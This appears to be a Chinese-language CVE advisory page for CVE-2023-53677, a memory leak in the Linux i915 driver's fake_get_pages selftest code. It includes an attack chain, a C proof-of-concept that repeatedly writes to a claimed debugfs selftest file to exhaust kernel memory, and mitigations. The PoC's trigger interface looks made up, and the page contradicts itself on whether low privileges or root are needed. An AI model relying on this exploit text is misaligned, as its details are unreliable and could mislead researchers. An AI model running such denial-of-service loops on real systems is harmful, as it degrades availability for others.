CVE-2023-53677：Linux内核i915驱动selftests内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2023-53677

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核（drm/i915驱动）

漏洞概述

CVE-2023-53677是Linux内核drm/i915图形驱动中的一个内存泄漏漏洞。该漏洞位于i915驱动的自测试（selftests）代码中，具体在fake_get_pages函数中。当该函数在错误处理路径上提前返回（error escape）时，未能正确释放已分配的内存资源，导致内存泄漏问题。该漏洞由Linux内核安全团队发现并修复，原始修复提交为8bfbdadce85c4c51689da10f39c805a7106d4567，随后被回移植到稳定内核版本中。

根据CVSS 3.1评分标准，该漏洞评分为5.5分，属于中等严重等级。攻击者需要本地访问权限和低权限账户即可触发该漏洞，但无需用户交互。该漏洞不会影响系统的机密性和完整性，但会对系统可用性产生高影响——随着内存泄漏的持续累积，可能导致系统内存耗尽，从而引发系统性能下降甚至拒绝服务状态。由于该漏洞存在于内核自测试代码中，触发条件相对有限，主要影响运行i915驱动自测试的系统环境，如开发测试平台或持续集成环境。

技术细节

该漏洞的技术原理在于Linux内核i915驱动的自测试框架中fake_get_pages函数的错误处理逻辑存在缺陷。fake_get_pages函数用于模拟获取GEM（Graphics Execution Manager）对象的物理页面，在自测试环境中模拟真实的页面分配行为。

在原始代码实现中，当函数执行过程中遇到错误条件时，会通过goto语句或直接return方式跳转到错误处理路径。然而，在这些错误转义路径（error escape paths）中，之前通过kmalloc、kvmalloc等内存分配函数成功分配的内存缓冲区未被正确释放，导致每次错误路径触发时都会泄漏一定数量的内存。

具体而言，漏洞触发流程如下：
1. fake_get_pages函数被i915 selftests调用以模拟页面获取操作
2. 函数内部分配了用于存储模拟页面数据的内存结构（如struct page数组或scatterlist）
3. 在后续处理过程中（如sg_alloc_table_from_pages或类似操作）发生错误
4. 错误处理路径直接返回，跳过了之前分配的内存的释放逻辑
5. 随着自测试的反复执行或长时间运行，泄漏的内存不断累积

利用方式方面，由于该漏洞位于内核自测试代码中，攻击者通常需要能够触发i915驱动的自测试模块执行才能利用此漏洞。在生产环境中利用价值较低，但在开发环境或测试环境中，攻击者可以通过反复触发相关selftest路径来耗尽系统内存资源，导致系统不稳定或拒绝服务。该漏洞的利用需要本地低权限访问权限，但不需要特殊权限提升。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标系统上拥有本地低权限账户访问权限，能够与i915 GPU驱动进行交互。

STEP 2

步骤2：定位i915自测试接口

攻击者通过debugfs文件系统或其他内核接口找到i915驱动的自测试触发入口（通常位于/sys/kernel/debug/dri/0/i915_selftest）。

STEP 3

步骤3：触发fake_get_pages测试路径

通过写入特定命令触发mock_request或其他会调用fake_get_pages函数的自测试项目，触发错误处理路径。

STEP 4

步骤4：反复触发导致内存累积泄漏

每次错误路径触发都会泄漏已分配的内存结构，反复执行导致内核内存不断累积泄漏。

STEP 5

步骤5：系统可用性受影响

随着内存泄漏持续累积，系统可用内存逐渐减少，最终可能导致系统性能严重下降或内核内存耗尽引发拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2023-53677: Linux kernel i915 selftests memory leak
// This PoC demonstrates how to trigger the memory leak in fake_get_pages
// by repeatedly invoking the i915 selftest that exercises fake_get_pages.
//
// Note: This requires access to a system with i915 GPU and the ability to
// trigger kernel selftests (e.g., via debugfs or module parameters).

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define I915_SELFTEST_PATH "/sys/kernel/debug/dri/0/i915_selftest"
#define FAKE_GET_PAGES_TEST "mock_request"

/*
 * Trigger the fake_get_pages selftest repeatedly to cause memory leak.
 * Each failed invocation leaks memory that was allocated but not freed
 * on the error escape path in fake_get_pages().
 */
int trigger_memory_leak(int iterations) {
    int fd;
    char buf[256];
    int i;

    printf("CVE-2023-53677 PoC: Triggering i915 fake_get_pages memory leak\n");
    printf("Iterations: %d\n", iterations);

    fd = open(I915_SELFTEST_PATH, O_WRONLY);
    if (fd < 0) {
        perror("Failed to open i915 selftest interface");
        printf("Note: Requires root privileges and i915 driver loaded\n");
        return -1;
    }

    for (i = 0; i < iterations; i++) {
        /* Trigger the mock_request selftest which exercises fake_get_pages */
        snprintf(buf, sizeof(buf), "%s\n", FAKE_GET_PAGES_TEST);
        if (write(fd, buf, strlen(buf)) < 0) {
            perror("Failed to trigger selftest");
            break;
        }

        if (i % 100 == 0) {
            printf("Iteration %d/%d completed\n", i, iterations);
        }
    }

    close(fd);
    printf("Memory leak trigger completed. Monitor memory usage with 'free -m'\n");
    return 0;
}

int main(int argc, char *argv[]) {
    int iterations = 1000;

    if (argc > 1) {
        iterations = atoi(argv[1]);
    }

    return trigger_memory_leak(iterations);
}

影响范围

Linux kernel < 596d7308e189a3230bf33d667b64acc73846c2d0（稳定版修复）

Linux kernel < 803033c148f754f32da1b93926c49c22731ec485（稳定版修复）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）在内核编译配置中禁用i915驱动的自测试功能（设置CONFIG_DRM_I915_SELFTEST=n），从根源上消除触发路径；2）通过文件系统权限限制对/sys/kernel/debug/dri/0/i915_selftest的访问，仅允许特权用户操作；3）使用cgroup或其他资源控制机制限制每个进程的最大内存使用量，防止单个进程通过触发内存泄漏耗尽系统资源；4）监控系统内存使用情况，配置告警机制以便及时发现异常内存增长。